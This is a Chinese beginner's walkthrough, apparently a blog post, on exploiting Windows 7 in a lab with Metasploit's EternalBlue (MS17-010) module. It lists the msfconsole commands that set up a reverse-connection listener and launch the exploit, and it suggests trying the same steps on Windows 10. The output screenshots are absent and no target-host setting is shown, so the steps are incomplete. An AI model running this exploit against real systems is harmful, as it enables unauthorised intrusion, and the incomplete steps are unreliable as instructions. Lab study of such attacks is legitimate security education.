网络安全技术新手入门：利用永恒之蓝获取靶机控制权限

目录

前言

一、搜索永恒之蓝可用模块

二、使用攻击模块

三、配置攻击模块

四、攻击

五、总结

---

前言

相关法律声明：《中华人民共和国网络安全法》第二十七条 任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动；不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具；明知他人从事危害网络安全的活动的，不得为其提供技术支持、广告推广、支付结算等帮助。

本文仅用于学习用途，读者应当不传播病毒以及做一些危害公共安全的行为，若读者利用所学对公共安全产生危害则与本人无关。

准备工作：

1.kali linux 系统        2.Windows7系统        3.保证攻击机与靶机之间能够ping通

步骤总览：

1.找到永恒之蓝可以使用的模块

2.使用永恒之蓝的攻击模块

3.配置永恒之蓝的攻击模块设置

4.攻击

tips:因为win10以上的系统均已打上了永恒之蓝补丁，所以行实验的时候使用win7作为靶机，读者在完成了对win7的权限获取之后，可以尝试同样的步骤对win10以上的系统进行攻击从而体会一下。

一、搜索永恒之蓝可用模块

输入命令：sudo su

输入命令：msfconsole

输入命令：search ms_010

搜索结果：

二、使用攻击模块

输入命令：use ms17_010_eternalblue 或者 use 0

三、配置攻击模块

展示攻击模块的配置项：

输入命令：show options

配置项如下：

正式配置：

输入命令：set lhost 192.168.10.151 以及 set lport 9999

配置结果如下：

四、攻击

输入命令：run

tips：如果读者没有运行成功，那么极有可能是端口被占用了

我在运行的时候没有运行成功，所以将监听端口从9999改为了10000

运行结果如下：

通过help命令可以查看获取权限之后所能够进行的操作：

五、总结

使用msf中的模块功能基本上都分为四大步：

1.找到需要使用的模块

2.使用模块

3.配置模块

4.运行模块